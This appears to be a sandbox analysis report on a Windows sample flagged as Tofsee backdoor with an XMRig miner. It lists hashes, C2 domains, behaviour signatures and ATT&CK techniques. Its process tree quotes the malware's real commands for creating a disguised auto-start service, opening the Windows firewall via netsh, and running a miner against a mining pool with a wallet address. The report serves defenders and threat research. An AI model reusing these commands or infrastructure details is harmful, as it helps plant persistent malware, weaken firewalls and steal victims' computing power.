Overview

overview

10

Static

static

dridex

windows10-2004_x64

10

Analysis

  • max time kernel
    185s
  • max time network
    200s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    15-06-2022 09:51

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    e04fd6d39fbbee850cee3ebb9573e44d28d357c7683f59fc3e76a741d7d5cec5.exe

  • Size

    259KB

  • MD5

    9591d38da291e3957ab1bdcbe57b67c1

  • SHA1

    8a305301e733d607ef478b0bb26465f6db3bb1e0

  • SHA256

    e04fd6d39fbbee850cee3ebb9573e44d28d357c7683f59fc3e76a741d7d5cec5

  • SHA512

    c95b19bc274bc6bbb5a3c4578b84a5b952342a8359076f1fded4679f61dad33c2dbc271fd7e098249acd15ba625aee5052f178704cc5a7109e77262d7e08fcb0

Score
10/10
tofseexmrigevasionminerpersistencetrojan

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner Payload 2 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e04fd6d39fbbee850cee3ebb9573e44d28d357c7683f59fc3e76a741d7d5cec5.exe
    "C:\Users\Admin\AppData\Local\Temp\e04fd6d39fbbee850cee3ebb9573e44d28d357c7683f59fc3e76a741d7d5cec5.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4884
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\cwmathzx\
      2⤵
        PID:4320
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\fvfqoobe.exe" C:\Windows\SysWOW64\cwmathzx\
        2⤵
          PID:3984
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create cwmathzx binPath= "C:\Windows\SysWOW64\cwmathzx\fvfqoobe.exe /d\"C:\Users\Admin\AppData\Local\Temp\e04fd6d39fbbee850cee3ebb9573e44d28d357c7683f59fc3e76a741d7d5cec5.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:4604
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description cwmathzx "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:1624
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start cwmathzx
          2⤵
          • Launches sc.exe
          PID:2708
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:1180
      • C:\Windows\SysWOW64\cwmathzx\fvfqoobe.exe
        C:\Windows\SysWOW64\cwmathzx\fvfqoobe.exe /d"C:\Users\Admin\AppData\Local\Temp\e04fd6d39fbbee850cee3ebb9573e44d28d357c7683f59fc3e76a741d7d5cec5.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:1296
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Sets service image path in registry
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:1836
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4692

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Persistence

      New Service

      1
      T1050

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Privilege Escalation

      New Service

      1
      T1050

      Defense Evasion

      Modify Registry

      1
      T1112

      Credential Access

      Discovery

      Query Registry

      1
      T1012

      System Information Discovery

      2
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\fvfqoobe.exe
        Filesize

        14.4MB

        MD5

        916676630ed829f18d060e96bf81d73e

        SHA1

        45733f018bf0cfc58882337c60efda4aaeecf6c6

        SHA256

        95621533752b8bb4e2db45c72a8411b3e4cbd25eb796ab55b2f5d22a31b7d171

        SHA512

        4c91966a810813473916b849e549c48859978ba71045fb63dd3be306cbfec66752069fc7747c11d324596d12634f4615b75246f4db7f4c471927d72f3a731629

        Download Submit
      • C:\Windows\SysWOW64\cwmathzx\fvfqoobe.exe
        Filesize

        14.4MB

        MD5

        916676630ed829f18d060e96bf81d73e

        SHA1

        45733f018bf0cfc58882337c60efda4aaeecf6c6

        SHA256

        95621533752b8bb4e2db45c72a8411b3e4cbd25eb796ab55b2f5d22a31b7d171

        SHA512

        4c91966a810813473916b849e549c48859978ba71045fb63dd3be306cbfec66752069fc7747c11d324596d12634f4615b75246f4db7f4c471927d72f3a731629

        Download Submit
      • memory/1180-139-0x0000000000000000-mapping.dmp
        Download
      • memory/1296-152-0x0000000000400000-0x000000000065D000-memory.dmp
        Filesize

        2.4MB

        Download
      • memory/1296-151-0x0000000000400000-0x000000000065D000-memory.dmp
        Filesize

        2.4MB

        Download
      • memory/1296-150-0x0000000000929000-0x0000000000937000-memory.dmp
        Filesize

        56KB

        Download
      • memory/1296-142-0x0000000000400000-0x000000000065D000-memory.dmp
        Filesize

        2.4MB

        Download
      • memory/1296-141-0x0000000000929000-0x0000000000937000-memory.dmp
        Filesize

        56KB

        Download
      • memory/1624-137-0x0000000000000000-mapping.dmp
        Download
      • memory/1836-144-0x00000000007B0000-0x00000000007C5000-memory.dmp
        Filesize

        84KB

        Download
      • memory/1836-165-0x0000000007700000-0x0000000007B0B000-memory.dmp
        Filesize

        4.0MB

        Download
      • memory/1836-168-0x0000000001DE0000-0x0000000001DE7000-memory.dmp
        Filesize

        28KB

        Download
      • memory/1836-162-0x0000000001DD0000-0x0000000001DD5000-memory.dmp
        Filesize

        20KB

        Download
      • memory/1836-143-0x0000000000000000-mapping.dmp
        Download
      • memory/1836-159-0x0000000001D40000-0x0000000001D50000-memory.dmp
        Filesize

        64KB

        Download
      • memory/1836-147-0x00000000007B0000-0x00000000007C5000-memory.dmp
        Filesize

        84KB

        Download
      • memory/1836-156-0x0000000001D30000-0x0000000001D36000-memory.dmp
        Filesize

        24KB

        Download
      • memory/1836-153-0x0000000002800000-0x0000000002A0F000-memory.dmp
        Filesize

        2.1MB

        Download
      • memory/2708-138-0x0000000000000000-mapping.dmp
        Download
      • memory/3984-134-0x0000000000000000-mapping.dmp
        Download
      • memory/4320-133-0x0000000000000000-mapping.dmp
        Download
      • memory/4604-136-0x0000000000000000-mapping.dmp
        Download
      • memory/4692-171-0x0000000000000000-mapping.dmp
        Download
      • memory/4692-172-0x0000000001270000-0x0000000001361000-memory.dmp
        Filesize

        964KB

        Download
      • memory/4692-177-0x0000000001270000-0x0000000001361000-memory.dmp
        Filesize

        964KB

        Download
      • memory/4884-132-0x0000000000400000-0x000000000065D000-memory.dmp
        Filesize

        2.4MB

        Download
      • memory/4884-131-0x0000000002250000-0x0000000002263000-memory.dmp
        Filesize

        76KB

        Download
      • memory/4884-149-0x0000000000400000-0x000000000065D000-memory.dmp
        Filesize

        2.4MB

        Download
      • memory/4884-148-0x00000000009BD000-0x00000000009CB000-memory.dmp
        Filesize

        56KB

        Download
      • memory/4884-130-0x00000000009BD000-0x00000000009CB000-memory.dmp
        Filesize

        56KB

        Download